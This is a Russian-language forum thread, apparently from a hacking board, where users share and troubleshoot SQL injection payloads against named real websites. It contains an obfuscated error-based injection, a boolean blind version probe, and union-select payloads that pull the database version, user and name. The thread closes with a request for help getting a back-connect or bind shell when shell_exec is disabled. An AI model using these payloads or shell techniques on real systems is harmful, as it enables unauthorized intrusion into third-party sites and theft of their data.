Сходу вывод не получил. Вслепую вектор будет следующим: 4 версия mysql, смотрите на временную задержку
Совместно с faza02 и YaBtr: Есть таблица images (одно из полей - image_id, второе - image). Доступна mysql. Error-based: Code: [I]id=1%20or%201%29%[/I][I]29%20gro[/I][I]up%20by[/I][I]%20c[/I][I]oncat%28vers[/I][I]ion%28%29,fl[/I][I]oor%28ra[/I][I]nd%280[/I][I]%29*2х[/I][I]%29%29%20[/I][I]having%20min%2[/I][I]80%29%2[/I][I]0or%201/*+[/I] Подзапросы не работают. Составить запрос для прямого вывода из таблицы пока не удалось.
error-based вектора для вывода для версии mysql 4.0 не существует на данный момент. в данной ситуации только time-based. однако у этого пользователя file_priv n
не пойму что за sql-inj такая тут http://il2.aviasibir.ru/mow/?page=squads&squad_id=4+and+1=1 http://il2.aviasibir.ru/mow/?page=squads&squad_id=4 вроде есть, а вроде и нет...
Как вам такой вариант, коллега ? _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=5 TRUE _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=4 FALSE
Не могу добраться к БД: Code: http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 --%20+
Code: ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
Парни,я понял что blind sql injection - это сначала запрос вида select count(*) from pages where id=... а потом select * from pages where id=... В случае если первый запрос возвращает 0 -происходит редирект. Вопрос. Как часто происходит редирект в blind sql injection
Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.
Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.
